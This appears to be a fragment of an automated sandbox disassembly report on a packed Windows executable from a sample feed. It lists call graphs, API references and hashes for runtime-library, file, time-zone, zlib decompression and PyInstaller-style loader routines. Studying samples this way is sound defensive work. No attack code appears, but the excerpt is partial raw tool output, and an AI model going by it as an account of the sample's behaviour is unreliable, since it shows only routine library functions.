__FrameHandler3::FrameUnwindToEmptyState 45 API calls 19357->19358 19359 7ff7b1110f31 19358->19359 19360 7ff7b110e524 45 API calls 19359->19360 19361 7ff7b1110f4a 19360->19361 19361->19355 19363 7ff7b1105578 45 API calls 19362->19363 19364 7ff7b1110f91 19363->19364 19367 7ff7b1110f9d 19364->19367 19369 7ff7b1113a90 19364->19369 19365 7ff7b10fbe00 _wfindfirst32i64 8 API calls 19367->19365 19370 7ff7b1105578 45 API calls 19369->19370 20900 7ff7b10fafbc 20901 7ff7b10fa3c3 20900->20901 20903 7ff7b10fa446 20900->20903 20902 7ff7b10fb640 12 API calls 20901->20902 20901->20903 20902->20903 19899 7ff7b11058f0 19900 7ff7b11058fb 19899->19900 19908 7ff7b110fd44 19900->19908 19921 7ff7b1111298 EnterCriticalSection 19908->19921 19922 7ff7b1112300 19933 7ff7b1118294 19922->19933 19935 7ff7b11182a1 19933->19935 19934 7ff7b110b4ec __free_lconv_num 11 API calls 19934->19935 19935->19934 19936 7ff7b11182bd 19935->19936 19937 7ff7b110b4ec __free_lconv_num 11 API calls 19936->19937 19938 7ff7b1112309 19936->19938 19937->19936 19939 7ff7b1111298 EnterCriticalSection 19938->19939 19510 7ff7b111ba8e 19511 7ff7b111ba9e 19510->19511 19514 7ff7b1105958 LeaveCriticalSection 19511->19514 20508 7ff7b10fa55d 20510 7ff7b10fa562 20508->20510 20509 7ff7b10fb640 12 API calls 20514 7ff7b10fa446 20509->20514 20510->20510 20515 7ff7b10fa6ca 20510->20515 20517 7ff7b10fa233 20510->20517 20518 7ff7b10fb750 20510->20518 20512 7ff7b10fb750 12 API calls 20513 7ff7b10fa9d8 20512->20513 20516 7ff7b10fb750 12 API calls 20513->20516 20515->20512 20515->20517 20516->20517 20517->20509 20517->20514 20519 7ff7b10fb7b0 20518->20519 20520 7ff7b10fbcea 20519->20520 20523 7ff7b10fb7cf 20519->20523 20521 7ff7b10fbf34 8 API calls 20520->20521 20522 7ff7b10fbcef 20521->20522 20524 7ff7b10fbe00 _wfindfirst32i64 8 API calls 20523->20524 20525 7ff7b10fbccc 20524->20525 20525->20515 20954 7ff7b111bc14 20957 7ff7b1105958 LeaveCriticalSection 20954->20957 20536 7ff7b10f9b8b 20539 7ff7b10f9b91 20536->20539 20537 7ff7b10fb640 12 API calls 20538 7ff7b10fa446 20537->20538 20539->20537 20539->20538 20583 7ff7b110bb70 20584 7ff7b110bb75 20583->20584 20588 7ff7b110bb8a 20583->20588 20589 7ff7b110bb90 20584->20589 20590 7ff7b110bbda 20589->20590 20591 7ff7b110bbd2 20589->20591 20593 7ff7b110b4ec __free_lconv_num 11 API calls 20590->20593 20592 7ff7b110b4ec __free_lconv_num 11 API calls 20591->20592 20592->20590 20594 7ff7b110bbe7 20593->20594 20595 7ff7b110b4ec __free_lconv_num 11 API calls 20594->20595 20596 7ff7b110bbf4 20595->20596 20597 7ff7b110b4ec __free_lconv_num 11 API calls 20596->20597 20598 7ff7b110bc01 20597->20598 20599 7ff7b110b4ec __free_lconv_num 11 API calls 20598->20599 20600 7ff7b110bc0e 20599->20600 20601 7ff7b110b4ec __free_lconv_num 11 API calls 20600->20601 20602 7ff7b110bc1b 20601->20602 20603 7ff7b110b4ec __free_lconv_num 11 API calls 20602->20603 20604 7ff7b110bc28 20603->20604 20605 7ff7b110b4ec __free_lconv_num 11 API calls 20604->20605 20606 7ff7b110bc35 20605->20606 20607 7ff7b110b4ec __free_lconv_num 11 API calls 20606->20607 20608 7ff7b110bc45 20607->20608 20609 7ff7b110b4ec __free_lconv_num 11 API calls 20608->20609 20610 7ff7b110bc55 20609->20610 20615 7ff7b110ba38 20610->20615 20629 7ff7b1111298 EnterCriticalSection 20615->20629

                                                            Executed Functions

                                                            Function 00007FF7B1116950 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 111 7ff7b1116950-7ff7b111698b call 7ff7b11162d8 call 7ff7b11162e0 call 7ff7b1116348 118 7ff7b1116991-7ff7b111699c call 7ff7b11162e8 111->118 119 7ff7b1116bb5-7ff7b1116c01 call 7ff7b110b4a4 call 7ff7b11162d8 call 7ff7b11162e0 call 7ff7b1116348 111->119 118->119 124 7ff7b11169a2-7ff7b11169ac 118->124 144 7ff7b1116c07-7ff7b1116c12 call 7ff7b11162e8 119->144 145 7ff7b1116d3f-7ff7b1116dad call 7ff7b110b4a4 call 7ff7b11121c8 119->145 126 7ff7b11169ce-7ff7b11169d2 124->126 127 7ff7b11169ae-7ff7b11169b1 124->127 130 7ff7b11169d5-7ff7b11169dd 126->130 129 7ff7b11169b4-7ff7b11169bf 127->129 132 7ff7b11169ca-7ff7b11169cc 129->132 133 7ff7b11169c1-7ff7b11169c8 129->133 130->130 134 7ff7b11169df-7ff7b11169f2 call 7ff7b110e19c 130->134 132->126 136 7ff7b11169fb-7ff7b1116a09 132->136 133->129 133->132 141 7ff7b1116a0a-7ff7b1116a16 call 7ff7b110b4ec 134->141 142 7ff7b11169f4-7ff7b11169f6 call 7ff7b110b4ec 134->142 152 7ff7b1116a1d-7ff7b1116a25 141->152 142->136 144->145 154 7ff7b1116c18-7ff7b1116c23 call 7ff7b1116318 144->154 165 7ff7b1116dbb-7ff7b1116dbe 145->165 166 7ff7b1116daf-7ff7b1116db6 145->166 152->152 155 7ff7b1116a27-7ff7b1116a38 call 7ff7b1111434 152->155 154->145 163 7ff7b1116c29-7ff7b1116c4c call 7ff7b110b4ec GetTimeZoneInformation 154->163 155->119 164 7ff7b1116a3e-7ff7b1116a94 call 7ff7b111b380 * 4 call 7ff7b111686c 155->164 178 7ff7b1116c52-7ff7b1116c73 163->178 179 7ff7b1116d14-7ff7b1116d3e call 7ff7b11162d0 call 7ff7b11162c0 call 7ff7b11162c8 163->179 223 7ff7b1116a96-7ff7b1116a9a 164->223 168 7ff7b1116dc0 165->168 169 7ff7b1116df5-7ff7b1116e08 call 7ff7b110e19c 165->169 171 7ff7b1116e4b-7ff7b1116e4e 166->171 172 7ff7b1116dc3 168->172 184 7ff7b1116e0a 169->184 185 7ff7b1116e13-7ff7b1116e2e call 7ff7b11121c8 169->185 171->172 173 7ff7b1116e54-7ff7b1116e5c call 7ff7b1116950 171->173 180 7ff7b1116dc8-7ff7b1116df4 call 7ff7b110b4ec call 7ff7b10fbe00 172->180 181 7ff7b1116dc3 call 7ff7b1116bcc 172->181 173->180 187 7ff7b1116c7e-7ff7b1116c85 178->187 188 7ff7b1116c75-7ff7b1116c7b 178->188 181->180 192 7ff7b1116e0c-7ff7b1116e11 call 7ff7b110b4ec 184->192 209 7ff7b1116e30-7ff7b1116e33 185->209 210 7ff7b1116e35-7ff7b1116e47 call 7ff7b110b4ec 185->210 194 7ff7b1116c87-7ff7b1116c8f 187->194 195 7ff7b1116c99 187->195 188->187 192->168 194->195 202 7ff7b1116c91-7ff7b1116c97 194->202 205 7ff7b1116c9b-7ff7b1116d0f call 7ff7b111b380 * 4 call 7ff7b11137ac call 7ff7b1116e64 * 2 195->205 202->205 205->179 209->192 210->171 225 7ff7b1116a9c 223->225 226 7ff7b1116aa0-7ff7b1116aa4 223->226 225->226 226->223 228 7ff7b1116aa6-7ff7b1116acb call 7ff7b110764c 226->228 234 7ff7b1116ace-7ff7b1116ad2 228->234 236 7ff7b1116ae1-7ff7b1116ae5 234->236 237 7ff7b1116ad4-7ff7b1116adf 234->237 236->234 237->236 239 7ff7b1116ae7-7ff7b1116aeb 237->239 242 7ff7b1116b6c-7ff7b1116b70 239->242 243 7ff7b1116aed-7ff7b1116b15 call 7ff7b110764c 239->243 244 7ff7b1116b77-7ff7b1116b84 242->244 245 7ff7b1116b72-7ff7b1116b74 242->245 250 7ff7b1116b17 243->250 251 7ff7b1116b33-7ff7b1116b37 243->251 247 7ff7b1116b9f-7ff7b1116bae call 7ff7b11162d0 call 7ff7b11162c0 244->247 248 7ff7b1116b86-7ff7b1116b9c call 7ff7b111686c 244->248 245->244 247->119 248->247 254 7ff7b1116b1a-7ff7b1116b21 250->254 251->242 256 7ff7b1116b39-7ff7b1116b57 call 7ff7b110764c 251->256 254->251 258 7ff7b1116b23-7ff7b1116b31 254->258 263 7ff7b1116b63-7ff7b1116b6a 256->263 258->251 258->254 263->242 264 7ff7b1116b59-7ff7b1116b5d 263->264 264->242 265 7ff7b1116b5f 264->265 265->263
                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116995
                                                              • Part of subcall function 00007FF7B11162E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B11162FC
                                                              • Part of subcall function 00007FF7B110B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B502
                                                              • Part of subcall function 00007FF7B110B4EC: GetLastError.KERNEL32(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B50C
                                                              • Part of subcall function 00007FF7B110B4A4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7B110B483,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110B4AD
                                                              • Part of subcall function 00007FF7B110B4A4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7B110B483,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110B4D2
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116984
                                                              • Part of subcall function 00007FF7B1116348: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B111635C
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116BFA
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116C0B
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116C1C
                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B1116E5C), ref: 00007FF7B1116C43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 1458651798-239921721
                                                            • Opcode ID: 6ec15ad00ebc81b5713ed5170bbebc68efdd6324f1cef62f169a4dbf8db42b45
                                                            • Instruction ID: be850a169b4cf009b79b9eed8e0d770ae8aab0cf33f143d68deb0cf23adee037
                                                            • Opcode Fuzzy Hash: 6ec15ad00ebc81b5713ed5170bbebc68efdd6324f1cef62f169a4dbf8db42b45
                                                            • Instruction Fuzzy Hash: 82D1B326A0825A86E720BF29F8401B9E751EF66788FC28135DB4D4368DDFFDE461C360
                                                            Function 00007FF7B111789C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 444 7ff7b111789c-7ff7b111790f call 7ff7b11175d0 447 7ff7b1117929-7ff7b1117933 call 7ff7b1108a14 444->447 448 7ff7b1117911-7ff7b111791a call 7ff7b1105a84 444->448 454 7ff7b111794e-7ff7b11179b7 CreateFileW 447->454 455 7ff7b1117935-7ff7b111794c call 7ff7b1105a84 call 7ff7b1105aa4 447->455 453 7ff7b111791d-7ff7b1117924 call 7ff7b1105aa4 448->453 471 7ff7b1117c6a-7ff7b1117c8a 453->471 456 7ff7b11179b9-7ff7b11179bf 454->456 457 7ff7b1117a34-7ff7b1117a3f GetFileType 454->457 455->453 460 7ff7b1117a01-7ff7b1117a2f GetLastError call 7ff7b1105a18 456->460 461 7ff7b11179c1-7ff7b11179c5 456->461 463 7ff7b1117a41-7ff7b1117a7c GetLastError call 7ff7b1105a18 CloseHandle 457->463 464 7ff7b1117a92-7ff7b1117a99 457->464 460->453 461->460 469 7ff7b11179c7-7ff7b11179ff CreateFileW 461->469 463->453 479 7ff7b1117a82-7ff7b1117a8d call 7ff7b1105aa4 463->479 467 7ff7b1117a9b-7ff7b1117a9f 464->467 468 7ff7b1117aa1-7ff7b1117aa4 464->468 474 7ff7b1117aaa-7ff7b1117aff call 7ff7b110892c 467->474 468->474 475 7ff7b1117aa6 468->475 469->457 469->460 482 7ff7b1117b1e-7ff7b1117b4f call 7ff7b1117350 474->482 483 7ff7b1117b01-7ff7b1117b0d call 7ff7b11177d8 474->483 475->474 479->453 489 7ff7b1117b51-7ff7b1117b53 482->489 490 7ff7b1117b55-7ff7b1117b97 482->490 483->482 491 7ff7b1117b0f 483->491 492 7ff7b1117b11-7ff7b1117b19 call 7ff7b110b664 489->492 493 7ff7b1117bb9-7ff7b1117bc4 490->493 494 7ff7b1117b99-7ff7b1117b9d 490->494 491->492 492->471 496 7ff7b1117c68 493->496 497 7ff7b1117bca-7ff7b1117bce 493->497 494->493 495 7ff7b1117b9f-7ff7b1117bb4 494->495 495->493 496->471 497->496 499 7ff7b1117bd4-7ff7b1117c19 CloseHandle CreateFileW 497->499 501 7ff7b1117c1b-7ff7b1117c49 GetLastError call 7ff7b1105a18 call 7ff7b1108b54 499->501 502 7ff7b1117c4e-7ff7b1117c63 499->502 501->502 502->496
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: ed7bb29f19db96d6df9cef71716606d4f492670f90b16f42eaf9bff86babf69b
                                                            • Instruction ID: 97513c9bdb08f839a52f68d8f9157e6e44d947a924116ff848c4efd0edd3ec4a
                                                            • Opcode Fuzzy Hash: ed7bb29f19db96d6df9cef71716606d4f492670f90b16f42eaf9bff86babf69b
                                                            • Instruction Fuzzy Hash: 6BC1F733B14A4A85EB10EF68E4802ACB761FB5ABACB550235DF1E57398DF78D165C320
                                                            Function 00007FF7B10F7950 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF7B10F153F), ref: 00007FF7B10F79E7
                                                              • Part of subcall function 00007FF7B10F7B60: GetEnvironmentVariableW.KERNEL32(00007FF7B10F39FF), ref: 00007FF7B10F7B9A
                                                              • Part of subcall function 00007FF7B10F7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7B10F7BB7
                                                              • Part of subcall function 00007FF7B11083CC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B11083E5
                                                            • SetEnvironmentVariableW.KERNEL32 ref: 00007FF7B10F7AA1
                                                              • Part of subcall function 00007FF7B10F2B10: MessageBoxW.USER32 ref: 00007FF7B10F2BE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                            • API String ID: 3752271684-1116378104
                                                            • Opcode ID: 8a0f81467077cc4c225813434d72b9cad563560c0a92c7b3ae5d3c4c9c93026c
                                                            • Instruction ID: 3827fa51e6641949668722213c07c465d95a9f8ea32380595bbf08ec77ce77be
                                                            • Opcode Fuzzy Hash: 8a0f81467077cc4c225813434d72b9cad563560c0a92c7b3ae5d3c4c9c93026c
                                                            • Instruction Fuzzy Hash: 04517F11F0D21B40FB54B62E68662BED3519FA7BC8FD45031EF0E8B69EDDACE4018661
                                                            Function 00007FF7B10FA55D Relevance: 12.0, Strings: 9, Instructions: 745COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                            • API String ID: 0-2665694366
                                                            • Opcode ID: 212d86a86c8cb6d9fc903fcdabd382662a83ce4cb1445b9d6573bc2018cf14a4
                                                            • Instruction ID: 1145ce095fe2ede5bdd21c06c4cab6f6031074d13bb2baba8bd6cd49e2a029b1
                                                            • Opcode Fuzzy Hash: 212d86a86c8cb6d9fc903fcdabd382662a83ce4cb1445b9d6573bc2018cf14a4
                                                            • Instruction Fuzzy Hash: 79523672A142A68BE7949F18C499B7E7BE9FB56304F814138E74A877C4DBBCD804CB50
                                                            Function 00007FF7B1116BCC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 953 7ff7b1116bcc-7ff7b1116c01 call 7ff7b11162d8 call 7ff7b11162e0 call 7ff7b1116348 960 7ff7b1116c07-7ff7b1116c12 call 7ff7b11162e8 953->960 961 7ff7b1116d3f-7ff7b1116dad call 7ff7b110b4a4 call 7ff7b11121c8 953->961 960->961 966 7ff7b1116c18-7ff7b1116c23 call 7ff7b1116318 960->966 973 7ff7b1116dbb-7ff7b1116dbe 961->973 974 7ff7b1116daf-7ff7b1116db6 961->974 966->961 972 7ff7b1116c29-7ff7b1116c4c call 7ff7b110b4ec GetTimeZoneInformation 966->972 984 7ff7b1116c52-7ff7b1116c73 972->984 985 7ff7b1116d14-7ff7b1116d3e call 7ff7b11162d0 call 7ff7b11162c0 call 7ff7b11162c8 972->985 976 7ff7b1116dc0 973->976 977 7ff7b1116df5-7ff7b1116e08 call 7ff7b110e19c 973->977 978 7ff7b1116e4b-7ff7b1116e4e 974->978 979 7ff7b1116dc3 976->979 989 7ff7b1116e0a 977->989 990 7ff7b1116e13-7ff7b1116e2e call 7ff7b11121c8 977->990 978->979 980 7ff7b1116e54-7ff7b1116e5c call 7ff7b1116950 978->980 986 7ff7b1116dc8-7ff7b1116df4 call 7ff7b110b4ec call 7ff7b10fbe00 979->986 987 7ff7b1116dc3 call 7ff7b1116bcc 979->987 980->986 992 7ff7b1116c7e-7ff7b1116c85 984->992 993 7ff7b1116c75-7ff7b1116c7b 984->993 987->986 996 7ff7b1116e0c-7ff7b1116e11 call 7ff7b110b4ec 989->996 1011 7ff7b1116e30-7ff7b1116e33 990->1011 1012 7ff7b1116e35-7ff7b1116e47 call 7ff7b110b4ec 990->1012 998 7ff7b1116c87-7ff7b1116c8f 992->998 999 7ff7b1116c99 992->999 993->992 996->976 998->999 1005 7ff7b1116c91-7ff7b1116c97 998->1005 1007 7ff7b1116c9b-7ff7b1116d0f call 7ff7b111b380 * 4 call 7ff7b11137ac call 7ff7b1116e64 * 2 999->1007 1005->1007 1007->985 1011->996 1012->978
                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116BFA
                                                              • Part of subcall function 00007FF7B1116348: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B111635C
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116C0B
                                                              • Part of subcall function 00007FF7B11162E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B11162FC
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116C1C
                                                              • Part of subcall function 00007FF7B1116318: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B111632C
                                                              • Part of subcall function 00007FF7B110B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B502
                                                              • Part of subcall function 00007FF7B110B4EC: GetLastError.KERNEL32(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B50C
                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B1116E5C), ref: 00007FF7B1116C43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 2248164782-239921721
                                                            • Opcode ID: 6e110c42c992c942a967616de5e9b20753deb8e2725d4993c570f78644da606e
                                                            • Instruction ID: e44b119ebb16b04f47defa949099dd43232c25e7ccba2d943f0214906946d449
                                                            • Opcode Fuzzy Hash: 6e110c42c992c942a967616de5e9b20753deb8e2725d4993c570f78644da606e
                                                            • Instruction Fuzzy Hash: E9518222A1864A86E710FF29F8805A9E760FB6A788FC24135DB4D4369DDFBDE450C760
                                                            Function 00007FF7B10F9D2B Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $header crc mismatch$unknown header flags set
                                                            • API String ID: 0-1127688429
                                                            • Opcode ID: 326cf6427d5bf0e9376a5910f25170e202e1497fb5a723acb88e47d2bece8f14
                                                            • Instruction ID: 70bbc82d1dbb2a18243c275b0a6a0e2e089b455c9ab5346b202724d93ea09c60
                                                            • Opcode Fuzzy Hash: 326cf6427d5bf0e9376a5910f25170e202e1497fb5a723acb88e47d2bece8f14
                                                            • Instruction Fuzzy Hash: 3AF1C362A083C58BE7A5AB18C0D9B3EBBA9FF56748F454534EB4907398CBB8D440DB50
                                                            Function 00007FF7B10F9B8B Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: incorrect header check$invalid window size
                                                            • API String ID: 0-900081337
                                                            • Opcode ID: eff0553be1f10ec537251e961509bf2a8d4d677e3d27bfe4c15f043eb5d22666
                                                            • Instruction ID: 48314f238ca81e7dfcc2c6ed45a1a6c496075cab30bd44f297fa2fbe67fc87b5
                                                            • Opcode Fuzzy Hash: eff0553be1f10ec537251e961509bf2a8d4d677e3d27bfe4c15f043eb5d22666
                                                            • Instruction Fuzzy Hash: 8B91DA72A182C587E7A4AB1CC4D9B3E7BA9FB66348F914139DB49467C8CB7CE540CB10
                                                            Function 00007FF7B10F1700 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
